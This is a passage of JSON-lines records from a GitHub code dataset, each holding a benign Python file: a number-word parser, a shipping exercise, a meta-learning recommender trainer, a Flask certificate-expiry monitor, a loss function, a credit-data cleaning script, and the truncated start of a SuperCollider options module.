+{"seq_id":"19569302053","text":"number_dict = {\n    'zero': 0,\n    'one': 1,\n    'two': 2,\n    'three': 3,\n    'four': 4,\n    'five': 5,\n    'six': 6,\n    'seven': 7,\n    'eight': 8,\n    'nine': 9,\n    'ten': 10,\n    'eleven': 11,\n    'twelve': 12,\n    'thirteen': 13,\n    'fourteen': 14,\n    'fifteen': 15,\n    'sixteen': 16,\n    'seventeen': 17,\n    'eighteen': 18,\n    'nineteen': 19,\n    'twenty': 20,\n    'thirty': 30,\n    'forty': 40,\n    'fifty': 50,\n    'sixty': 60,\n    'seventy': 70,\n    'eighty': 80,\n    'ninety': 90,\n    'hundred': 100,\n    'thousand': 1000,\n    'million': 1000000\n}\n\n\ndef parse_int(string):\n    string = string.replace(' and ', ' ')\n    string = string.replace('-', ' ')\n    numbers = string.split(' ')\n    arr = []\n    for item in numbers:\n        arr.append(number_dict[item])\n    # walk the values: scale words (100/1000/1000000) multiply the running chunk, everything else is added\n    i = 0\n    total = 0\n    temp = 0\n\n    while i < len(arr):\n        if arr[i] == 100:\n            temp *= arr[i]\n        elif arr[i] in [1000, 1000000]:\n            temp *= arr[i]\n            total += temp\n            temp = 0\n        else:\n            temp += arr[i]\n\n        i += 1\n\n    return total + temp\n\n\nprint(parse_int(\"one\")) # 1\nprint(parse_int(\"twenty\")) # 20\nprint(parse_int(\"two hundred forty-six\")) # 246\nprint(parse_int(\"seven hundred eighty-three thousand nine hundred and nineteen\")) # 783919\n","repo_name":"NikGor/CodeWars","sub_path":"parse_int.py","file_name":"parse_int.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13611145771","text":"# You are an owner of a cargo plane with capacity of 500kg. Amazon has asked you\n# to transport as many of the items given in a specific order (their order\n# cannot change) as possible from the US to Europe. They have given you a list\n# of corresponding values which they will pay you for transporting. The total\n# cost of shipping for you is 3500.\n\ncapacity = 500\n\nweights = [94,27,94,50,79,67,43,87,75,84]\nvalues = [200,343,472,141,616,681,932,194,430,482]\n\nshipping_cost = 3500\n\n# Answer the following questions:\n# 1. How many items can you ship to Europe\n# 2. What is their total weight\n# 3. Would you earn any money by acepting Amazon's request?\n\ncurrent_weight = 0\ntotal_value = 0\ni = 0\n\nwhile current_weight < capacity and i < len(weights):\n    if capacity - current_weight >= weights[i]:\n        current_weight += weights[i]\n        total_value += values[i]\n        i += 1\n    else:\n        break\n\nprint(\"We can ship\",i,\"items\")\nprint(\"Their total weight is\",current_weight)\n\nif total_value > shipping_cost:\n    print(\"We would earn money if we shipped eligible items\")\nelse:\n    print(\"Let's refer Amazon to our competitor FedEx\")\n","repo_name":"matthewtaylorsc/pyintro","sub_path":"codelabs/solutions/ex4_amazon_shipping_sol.py","file_name":"ex4_amazon_shipping_sol.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4190467143","text":"import argparse\nimport time\n\nimport torch\n\nimport learn2learn as l2l\nfrom tqdm import tqdm\n\nfrom xmrec.data.data import MAMLTaskGenerator, MetaMarketDataloaders\nfrom xmrec.models.model import NeuMF\nimport pandas as pd\nimport os\nimport json\n\nimport sys\nimport pickle\n\nfrom xmrec.utils.forec_utils import test_model, set_seed, get_model_cid_dir, get_model_config, resume_checkpoint, \\\n    save_checkpoint, use_cuda\n\n\ndef create_arg_parser():\n    parser = argparse.ArgumentParser('MAML_NeuMF_Engine')\n    parser.add_argument(\"--experiment_type\",\n                        choices=[\"single_model\", \"pair\"],\n                        help=\"if 'single_model' aug_src_market argument is ignored and all markets are used\",\n                        default=\"pair\")\n    # Path Arguments\n    parser.add_argument('--num_epoch', type=int, default=25, help='number of epochs')\n    # batch_size acts as the k-shots here; the default is 20, not 1024\n    parser.add_argument('--batch_size', type=int, default=20, help='batch size')\n    parser.add_argument('--num_neg', type=int, default=4, help='number 
of negatives to sample during training')\n parser.add_argument('--cuda', action='store_true', help='use of cuda')\n parser.add_argument('--seed', type=int, default=42, help='manual seed init')\n\n # output arguments\n parser.add_argument('--exp_name', help='name the experiment', type=str, required=True)\n parser.add_argument('--exp_output', help='output results .json file', type=str, required=True)\n\n # data arguments\n parser.add_argument('--data_dir', help='dataset directory', type=str, default='DATA2/proc_data')\n parser.add_argument('--tgt_market', help='specify target market', type=str, required=False,\n default=None) # de_Electronics\n parser.add_argument('--aug_src_market', help='which data to augment with', type=str, default='xx') # us_Electronics\n\n # sampling_method:\n parser.add_argument('--data_sampling_method', help='in augmentation how to sample data for training', type=str,\n default='concat', choices=['concat', 'equal'])\n\n # MAML arguments\n parser.add_argument('--fast_lr', type=float, default=0.1, help='meta-learning rate')\n # cold start setup\n parser.add_argument('--tgt_fraction', type=int, default=1, help='what fraction of data to use on target side')\n parser.add_argument('--src_fraction', type=int, default=1, help='what fraction of data to use from source side')\n\n # during Hyperparam search, we don't need to save the model\n parser.add_argument('--no_save', action=\"store_true\", default=False,\n help=\"disables persisting the final model if set\")\n\n parser.add_argument('--market_aware', action=\"store_true\", default=False,\n help=\"learns market embeddings in addition to user/item embeddings\")\n\n return parser\n\n\ndef fast_adapt(config, batch_adapt, batch_eval, learner, loss, adaptation_steps, mkt_idx):\n adapt_user_ids, adapt_item_ids, adapt_targets, adapt_markets = batch_adapt\n eval_user_ids, eval_item_ids, eval_targets, eval_markets = batch_eval\n\n adapt_markets = torch.LongTensor([mkt_idx[m] for m in adapt_markets])\n eval_markets = torch.LongTensor([mkt_idx[m] for m in eval_markets])\n\n if config['use_cuda'] is True:\n adapt_user_ids, adapt_item_ids, adapt_targets = adapt_user_ids.cuda(), adapt_item_ids.cuda(), adapt_targets.cuda()\n eval_user_ids, eval_item_ids, eval_targets = eval_user_ids.cuda(), eval_item_ids.cuda(), eval_targets.cuda()\n\n adapt_markets = adapt_markets.cuda()\n eval_markets = eval_markets.cuda()\n\n # Adapt the model\n for step in range(adaptation_steps):\n ratings_pred = learner(adapt_user_ids, adapt_item_ids, adapt_markets)\n train_error = loss(ratings_pred.view(-1), adapt_targets)\n learner.adapt(train_error)\n\n # Evaluate the adapted model\n predictions = learner(eval_user_ids, eval_item_ids, eval_markets)\n valid_error = loss(predictions.view(-1), eval_targets)\n return valid_error\n\n\ndef run_batch(iterators, mkt, mkt_idx, maml, config, loss_func, adaptation_steps, train=True, learner=None):\n if learner is None:\n learner = maml.clone()\n adapt_batch = next(iterators[mkt])\n eval_batch = next(iterators[mkt])\n\n evaluation_error = fast_adapt(config,\n adapt_batch,\n eval_batch,\n learner,\n loss_func,\n adaptation_steps,\n mkt_idx)\n if train:\n evaluation_error.backward()\n\n return evaluation_error\n\n\nif __name__ == \"__main__\":\n parser = create_arg_parser()\n args = parser.parse_args()\n set_seed(args)\n\n if args.experiment_type == \"pair\":\n assert args.tgt_market is not None\n assert args.aug_src_market is not None\n markets = [args.tgt_market, args.aug_src_market]\n elif args.experiment_type == 
\"single_model\":\n args.markets = \"de,jp,in,fr,ca,mx,uk\"\n markets = args.markets.split(\",\")\n else:\n raise ValueError(args.experiment_type)\n\n args.data_augment_method = 'full_aug'\n args.model_selection = 'nmf'\n\n nmf_model_dir, cid_filename = get_model_cid_dir(args, args.model_selection)\n print(nmf_model_dir, cid_filename)\n with open(cid_filename, 'rb') as centralid_file:\n my_id_bank = pickle.load(centralid_file)\n\n ############\n ## All Market data\n ############\n task_gen_all = {}\n market_index = {}\n\n if args.experiment_type == \"single_model\":\n print(\"loading us data\")\n # load the us market data\n us_data_dir = os.path.join(args.data_dir, f'us_10core.txt')\n us_ratings = pd.read_csv(us_data_dir, sep=\" \")\n\n us_task_gen = MAMLTaskGenerator(us_ratings, \"us\", my_id_bank, item_thr=7)\n\n items_allowed = us_task_gen.item_pool_ids\n assert \"us\" not in markets\n task_gen_all[0] = us_task_gen\n market_index[0] = \"us\"\n\n print(f\"data sampling method: {args.data_sampling_method}\")\n for i, market in enumerate(markets, 1):\n print(f\"loading {market}\")\n ratings_path = os.path.join(args.data_dir, f'{market}_5core.txt')\n ratings = pd.read_csv(ratings_path, sep=\" \")\n task_gen_all[i] = MAMLTaskGenerator(ratings, market, my_id_bank, item_thr=7)\n market_index[i] = market\n\n else:\n for mar_index, cur_market in enumerate(markets):\n cur_mkt_data_dir = os.path.join(args.data_dir, f'{cur_market}_5core.txt')\n if cur_market == 'us':\n cur_mkt_data_dir = os.path.join(args.data_dir, f'{cur_market}_10core.txt')\n print(f'loading {cur_mkt_data_dir}')\n cur_mkt_ratings = pd.read_csv(cur_mkt_data_dir, sep=' ')\n\n cur_mkt_fraction = args.src_fraction if mar_index >= 1 else args.tgt_fraction\n\n task_generator = MAMLTaskGenerator(\n ratings=cur_mkt_ratings,\n market=cur_market,\n id_index_bank=my_id_bank,\n item_thr=7,\n sample_df=cur_mkt_fraction)\n\n task_gen_all[mar_index] = task_generator\n market_index[mar_index] = cur_market\n\n print('loaded all data!')\n\n sys.stdout.flush()\n\n ############\n ## Dataset Concatenation\n ############\n sampling_method = args.data_sampling_method # 'concat' 'equal'\n\n dataloaders = MetaMarketDataloaders(tasks=task_gen_all,\n sampling_method=sampling_method,\n num_train_negatives=args.num_neg,\n batch_size=args.batch_size,\n shuffle=True)\n ############\n ## Model Prepare\n ############\n all_model_selection = ['nmf']\n\n results = {}\n\n for cur_model_selection in all_model_selection:\n sys.stdout.flush()\n args.model_selection = cur_model_selection\n config = get_model_config(args.model_selection)\n config['batch_size'] = args.batch_size\n config['optimizer'] = 'adam'\n config['use_cuda'] = args.cuda\n config['device_id'] = 0\n config['save_trained'] = False if args.no_save else True\n config['load_pretrained'] = True\n config['num_users'] = int(my_id_bank.last_user_index + 1)\n config['num_items'] = int(my_id_bank.last_item_index + 1)\n config['num_markets'] = len(markets)\n config['market_aware'] = args.market_aware\n config[\"mkt_idx\"] = {m: i for (i, m) in market_index.items()}\n\n model = NeuMF(config)\n if config['use_cuda'] is True:\n use_cuda(True, config['device_id'])\n model.cuda()\n resume_checkpoint(model, model_dir=nmf_model_dir, device_id=config['device_id'], cuda=config[\"use_cuda\"])\n print(model)\n sys.stdout.flush()\n\n fast_lr = args.fast_lr # =0.5\n # meta_batch_size = train_dataloader.num_tasks # 32\n adaptation_steps = 1\n test_adaptation_steps = 1 # how many times adapt the model for testing time\n\n maml 
= l2l.algorithms.MAML(model, lr=fast_lr, first_order=False)\n opt = torch.optim.Adam(maml.parameters(), lr=config['adam_lr'], weight_decay=config['l2_regularization'])\n loss_func = torch.nn.BCELoss()\n\n ############\n ## Train\n ############\n\n # do a dummy run to figure out how many batches are there for each\n # market\n samples = {}\n for mkt_idx, mkt in market_index.items():\n samples[mkt_idx] = len(dataloaders.get_split(mkt_idx, \"train\"))\n\n # the original code oversamples the smaller markets\n # but since we want to do epochs based on target markets\n # we will use min instead of max\n n_samples = min(samples.values())\n\n start_time = time.time()\n for epoch in tqdm(range(args.num_epoch), desc=\"Train\"):\n sys.stdout.flush()\n\n # train_dl_dict = {}\n iterators = {}\n valid_iterators = {}\n n_iterations = {}\n for mkt_idx, mkt in market_index.items():\n train_dl = dataloaders.get_single_train_dataloader(mkt_idx,\n n_samples=n_samples,\n shuffle=True)\n iterators[mkt_idx] = iter(train_dl)\n valid_iterators[mkt_idx] = iter(dataloaders.get_valid_dataloader(mkt_idx, \"valid\"))\n n_iterations[mkt_idx] = len(train_dl)\n\n # since 2 batches are extracted at a time\n n_iterations = int(min(n_iterations.values()) / 2)\n for iter_num in tqdm(range(n_iterations), desc=f\"iter epoch {epoch}\", leave=False):\n opt.zero_grad()\n meta_train_loss = 0.0\n meta_valid_loss = 0.0\n for mkt in market_index:\n evaluation_error = run_batch(iterators,\n mkt,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=True)\n\n meta_train_loss += evaluation_error.item()\n\n evaluation_error_val = run_batch(valid_iterators,\n mkt,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=False)\n\n meta_valid_loss += evaluation_error_val.item()\n\n for p in maml.parameters():\n p.grad.data.mul_(1.0 / len(iterators))\n opt.step()\n\n train_time = time.time() - start_time\n ############\n ## TEST\n ############\n cur_model_results = {}\n\n test_iterators = {}\n test_qrel = {}\n\n valid_iterators = {}\n valid_dataloaders = {}\n test_dataloaders = {}\n valid_qrel = {}\n n_iterations = {}\n for mkt_idx, mkt in market_index.items():\n valid_dataloaders[mkt_idx] = dataloaders.get_valid_dataloader(mkt_idx, \"valid\")\n valid_iterators[mkt_idx] = iter(valid_dataloaders[mkt_idx])\n valid_qrel[mkt_idx] = task_gen_all[mkt_idx].get_validation_qrel(\"valid\")\n\n test_dataloaders[mkt_idx] = dataloaders.get_valid_dataloader(mkt_idx, \"test\")\n test_iterators[mkt_idx] = iter(test_dataloaders[mkt_idx])\n test_qrel[mkt_idx] = task_gen_all[mkt_idx].get_validation_qrel(\"test\")\n\n\n for cur_market in markets:\n market_index_inv = {m: i for (i, m) in market_index.items()}\n mar_index = market_index_inv[cur_market]\n # validation data\n learner = maml.clone()\n\n for test_adapt_step in range(test_adaptation_steps):\n evaluation_error = run_batch(valid_iterators,\n mar_index,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=False,\n learner=learner)\n\n print(f'test eval on {cur_market} adaptation step: {test_adapt_step}')\n valid_ov, valid_ind = test_model(learner, config, valid_dataloaders[mar_index], valid_qrel[mar_index])\n cur_ndcg = valid_ov['ndcg_cut_10']\n cur_recall = valid_ov['recall_10']\n print(\n f'[pytrec_based] Market: {cur_market} step{test_adapt_step} tgt_valid: \\t NDCG@10: {cur_ndcg} \\t R@10: {cur_recall}')\n\n cur_model_results[f'valid_{cur_market}_step{test_adapt_step}'] = {\n 'agg': valid_ov,\n 'ind': valid_ind,\n }\n\n 
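# note: the same adapted clone (learner) is evaluated below on the held-out test split\n                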
# test data\n test_ov, test_ind = test_model(learner, config, test_dataloaders[mar_index], test_qrel[mar_index])\n cur_ndcg = test_ov['ndcg_cut_10']\n cur_recall = test_ov['recall_10']\n print(\n f'[pytrec_based] Market: {cur_market} step{test_adapt_step} tgt_test: \\t NDCG@10: {cur_ndcg} \\t R@10: {cur_recall} \\n\\n')\n\n cur_model_results[f'test_{cur_market}_step{test_adapt_step}'] = {\n 'agg': test_ov,\n 'ind': test_ind,\n }\n\n cur_model_results[\"train_time\"] = train_time\n results[args.model_selection] = cur_model_results\n\n ############\n ## SAVE the model\n ############\n if config['save_trained']:\n # model_dir, cid_filename = get_model_cid_dir(args, args.model_selection)\n maml_nmf_output_dir = nmf_model_dir.replace('/', f'/maml{args.batch_size}_')\n save_checkpoint(maml, maml_nmf_output_dir)\n\n os.makedirs(os.path.dirname(args.exp_output), exist_ok=True)\n # writing the results into a file\n results['args'] = vars(args)\n with open(args.exp_output, 'w') as outfile:\n json.dump(results, outfile)\n print('Experiment finished success!')\n","repo_name":"samarthbhargav/efficient-xmrec","sub_path":"train_maml.py","file_name":"train_maml.py","file_ext":"py","file_size_in_byte":15926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14631955044","text":"from flask import (\n render_template,\n request,\n render_template,\n flash,\n redirect,\n url_for,\n Blueprint,\n current_app,\n session,\n)\nimport modules.cert.readwrite\nimport modules.cert.checkexpiry\nimport modules.cert.grade_ssllabs\nfrom modules.authentication import validate_user_role\nfrom modules import mail\nimport json\nimport logging\n\ncert_blueprint_routes = Blueprint(\n \"cert_blueprint_routes\",\n __name__,\n template_folder=\"templates\",\n static_folder=\"static\",\n static_url_path=\"cert\",\n)\n\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG)\nlogging.captureWarnings(True)\n#LEVEL=\"DEBUG\"\n#logging.getLogger().setLevel(eval(\"logging.\" + LEVEL))\nlogging.info(\"This is from %s and is a INFO message\" % __name__)\nlogging.debug(\"This is from %s and is a DEBUG message\" % __name__)\nlogging.warn(\"This is from %s and is a WARNING message\" % __name__)\n\n@cert_blueprint_routes.route(\"/\")\ndef index():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n\n logging.debug(\"This is @cert_blueprint_routes.index()\")\n results = request.args.get(\"cert\")\n certs = modules.cert.readwrite.read_records_db()\n return render_template(\"cert/index.html\", results=results, certs=certs)\n\n\n@cert_blueprint_routes.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {}\n addhelp={}\n if request.method == \"POST\":\n try:\n cert[\"url\"] = request.form[\"url\"]\n except:\n pass\n try:\n cert[\"port\"] = request.form[\"port\"]\n except:\n pass\n addhelp={}\n if ( not request.form[\"url\"] ):\n addhelp[\"url\"]=\"*\"\n if ( not request.form[\"port\"] ):\n addhelp[\"port\"] = \"*\"\n if (\n not request.form[\"url\"]\n or not request.form[\"port\"]\n ):\n 
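# a required field is missing: warn and re-render the form with the hint markers set above\n            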
flash(\"Please enter all the fields\", \"warning\")\n return render_template(\"cert/add.html\", cert=cert,addhelp=addhelp)\n else:\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n \"contact\": request.form[\"contact\"],\n }\n try:\n daysToGo,expiryDate = modules.cert.checkexpiry.checkcert(cert)\n cert['daysToGo']=daysToGo\n cert['expiryDate']=expiryDate\n if expiryDate == -1 and daysToGo== -1:\n cert['status'] = 'down'\n else: \n cert['status'] = 'up'\n except:\n daysToGo = -1\n cert['status'] = 'down'\n if modules.cert.readwrite.insert_record_db(cert):\n flash(\"Record was successfully added\", 'success')\n else:\n flash(f\"Record {cert} was not added\", 'warning')\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n return render_template(\"cert/add.html\",cert=cert,addhelp=addhelp)\n\n\n@cert_blueprint_routes.route(\"/search\", methods=[\"GET\"])\ndef search():\n logging.getLogger().setLevel(logging.WARN)\n\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n cert={}\n try:\n request.args.get('url')\n cert['url'] = request.args.get('url') \n except: \n flash(\"Please enter a url search string\", \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"),url=None,port=port)\n if request.args.get('port'):\n cert['port'] = request.args.get('port') \n else:\n cert['port'] = \"443\"\n result,count = modules.cert.readwrite.read_record_db(cert)\n logging.debug(f\"debug search {count}, {result}\")\n if count == 1:\n pass\n elif count > 1:\n flash(f\"Multiple records found for {cert['url']}\", \"warning\")\n elif count == 0:\n flash(\"Not found\", \"warning\")\n result = {}\n certs = modules.cert.readwrite.read_records_db()\n return render_template(\"cert/index.html\", result=result, certs=certs)\n\n\n@cert_blueprint_routes.route(\"/edit\", methods=[\"GET\", \"POST\"])\ndef edit():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n if request.method == \"GET\":\n cert = { \"url\": request.args.get(\"url\"), \n \"port\": request.args.get(\"port\"),\n \"contact\": request.args.get(\"contact\")\n }\n if request.method == \"POST\":\n cert= {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n \"contact\": request.form[\"contact\"]\n }\n try:\n request.form[\"update_button\"]\n if request.form[\"update_button\"] == \"update_button\":\n logging.debug(f\"About to update {cert}\")\n if modules.cert.readwrite.update_record_db_ext(cert):\n logging.warning(\"ran the update %s\" % cert)\n flash(f\"Record {cert['url']} was updated \", 'info')\n else:\n logging.debug(\"failed the update db_ext\")\n flash(f\"Error {cert['url']} was not updated\", 'error')\n except:\n pass\n return render_template(\"cert/edit.html\", cert=cert)\n\n\n@cert_blueprint_routes.route(\"/delete\", methods=[\"POST\"])\ndef delete():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return 
redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n }\n try:\n request.form[\"delete_button\"]\n if request.form[\"delete_button\"] == \"delete_button\":\n logging.debug(\"About to delete %s\" % cert )\n if modules.cert.readwrite.delete_record_db(cert):\n flash(f\"certificate record for {cert['url']}:{cert['port']} was deleted\", \"warning\")\n else:\n logging.debug(\"failed to delete %s \" % cert)\n flash(f\"Error {cert['url']} failed to delete\", \"danger\")\n except:\n pass\n print(\"request.form.delete \", request.form[\"delete\"])\n flash(\"Failed to delete\")\n return redirect(url_for(\"cert_blueprint_routes.index\", cert=cert))\n\n@cert_blueprint_routes.route(\"/check\", methods=[\"POST\"])\ndef check():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"]\n }\n if request.form[\"check_button\"] == \"check_button\":\n try:\n daysToGo,expiryDate = modules.cert.checkexpiry.checkcert(cert)\n except:\n logging.debug('failed to call checkexpiry')\n flash('Failed to check',\"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\", cert=cert))\n if daysToGo >=0:\n cert['status'] = \"up\"\n cert['expiryDate'] = expiryDate\n else:\n cert['status'] = \"down\"\n if modules.cert.readwrite.update_record_db_ext(cert):\n logging.debug(\"check(): callling update_record_db_ext %s\" % cert)\n flash(f\"Record {cert['url']} was updated \", 'info')\n else:\n logging.debug(\"failed the update db_ext\")\n flash(f\"Error {cert['url']} was not updated\", 'error')\n return redirect(url_for(\"cert_blueprint_routes.search\", url=cert[\"url\"], port=cert[\"port\"]))\n\n@cert_blueprint_routes.route(\"/checkall\", methods=[\"POST\"])\ndef checkall():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n modules.cert.readwrite.recalculateAll()\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n\n@cert_blueprint_routes.route(\"/grade\", methods=[\"POST\"])\ndef grade():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"]\n }\n modules.cert.grade_ssllabs.grade_ssllabs(cert['url'])\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n\n@cert_blueprint_routes.route(\"/mail\", methods=[\"POST\"])\ndef mail():\n logging.getLogger().setLevel(logging.DEBUG)\n logging.debug(f\"Debug x message 
from /mail\")\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n }\n if request.form[\"mail_button\"] == \"mail_button\":\n result,count = modules.cert.readwrite.read_record_db(cert)\n # read_record can return a dict or a list of dicts, so len of 1 is a dict\n '''\n if count == 1:\n try:\n result['contact'] == \"\"\n except:\n flash(\"There is no contact to mail\",\"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n '''\n for r in result:\n logging.debug(f\"debugging mail {r['contact']}\")\n if r['contact'] != '':\n logging.debug(f\"debugging mail {r}\")\n modules.mail.mail_warning(r['contact'], r['url'], \n r['daysToGo'],\n r['expiryDate'],\n r['port'])\n else:\n flash(f\"No contact to mail for {r['url']}\")\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n","repo_name":"Fabio-RibeiroB/freecertiffy","sub_path":"flaskapp/flaskapp/cert_blueprint_routes.py","file_name":"cert_blueprint_routes.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16942369140","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef EntropyLoss(input_):\n mask = input_.ge(0.000001)\n mask_out = torch.masked_select(input_, mask)\n entropy = -(torch.sum(mask_out * torch.log(mask_out)))\n return entropy / float(input_.size(0))\n\ndef SAN(input_list, ad_net_list, grl_layer_list, class_weight, use_gpu=True):\n loss = 0\n outer_product_out = torch.bmm(input_list[0].unsqueeze(2), input_list[1].unsqueeze(1))\n batch_size = input_list[0].size(0) // 2\n dc_target = Variable(torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float())\n if use_gpu:\n dc_target = dc_target.cuda()\n for i in range(len(ad_net_list)):\n ad_out = ad_net_list[i](grl_layer_list[i](outer_product_out.narrow(2, i, 1).squeeze(2)))\n loss += nn.BCELoss()(ad_out.view(-1), dc_target.view(-1))\n return loss\n","repo_name":"thuml/SAN","sub_path":"pytorch/src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"53"} +{"seq_id":"32982987044","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom mmodules.load_Data import _load\n\nsns.set_style(\"darkgrid\", {\"grid.color\": \".6\", \"grid.linestyle\": \":\"})\nsp = {\"end\":\"\\n\\n\\n\", \"sep\":\"\\n\"}\n\ncredit = _load()\n\n# Print a null value column array\nprint(credit.columns[credit.isnull().any()], credit.shape, **sp)\n\n# Print the top five rows with nulls for employment length\nprint(credit[credit[\"person_emp_length\"].isnull()].head(), **sp)\n\n# Impute the null values with the median value for all employment lengths\ncredit['person_emp_length'].fillna((credit['person_emp_length'].median()), inplace=True)\n\n# Create a histogram of employment length\nn, bins, patches = plt.hist(credit[\"person_emp_length\"], bins='auto', color='blue')\nplt.xlabel(\"Person Employment Length\")\nplt.show()\n\n# Print the number of 
nulls\nprint(credit[\"loan_int_rate\"].isnull().sum(), **sp)\n\n# Store the array on indices\nindices = credit[credit[\"loan_int_rate\"].isnull()].index\n\n# Save the new data without missing data\ncredit_clean = credit.drop(indices)\nprint(credit_clean.shape, **sp)\n\n","repo_name":"jocoder22/TimerSeriesAnalysis","sub_path":"Credit_Risk_Modelling/103_missing_data_handling.py","file_name":"103_missing_data_handling.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72994691049","text":"import asyncio\nimport atexit\nimport enum\nimport logging\nimport os\nimport platform\nimport signal\nimport subprocess\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple\n\nimport uqbar.io\nimport uqbar.objects\n\nfrom .exceptions import ServerCannotBoot\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_IP_ADDRESS = \"127.0.0.1\"\nDEFAULT_PORT = 57110\nENVAR_SERVER_EXECUTABLE = \"SUPRIYA_SERVER_EXECUTABLE\"\n\n\n@dataclass(frozen=True)\nclass Options:\n \"\"\"\n SuperCollider server options configuration.\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n audio_bus_channel_count: int = 1024\n block_size: int = 64\n buffer_count: int = 1024\n control_bus_channel_count: int = 16384\n executable: Optional[str] = None\n hardware_buffer_size: Optional[int] = None\n initial_node_id: int = 1000\n input_bus_channel_count: int = 8\n input_device: Optional[str] = None\n input_stream_mask: str = \"\"\n ip_address: str = DEFAULT_IP_ADDRESS\n load_synthdefs: bool = True\n maximum_logins: int = 1\n maximum_node_count: int = 1024\n maximum_synthdef_count: int = 1024\n memory_locking: bool = False\n memory_size: int = 8192\n output_bus_channel_count: int = 8\n output_device: Optional[str] = None\n output_stream_mask: str = \"\"\n password: Optional[str] = None\n port: int = DEFAULT_PORT\n protocol: str = \"udp\"\n random_number_generator_count: int = 64\n remote_control_volume: bool = False\n realtime: bool = True\n restricted_path: Optional[str] = None\n sample_rate: Optional[int] = None\n threads: Optional[int] = None\n ugen_plugins_path: Optional[str] = None\n verbosity: int = 0\n wire_buffer_count: int = 64\n zero_configuration: bool = False\n\n ### INITIALIZER ###\n\n def __post_init__(self):\n if self.input_bus_channel_count is None:\n object.__setattr__(self, \"input_bus_channel_count\", 8)\n if self.output_bus_channel_count is None:\n object.__setattr__(self, 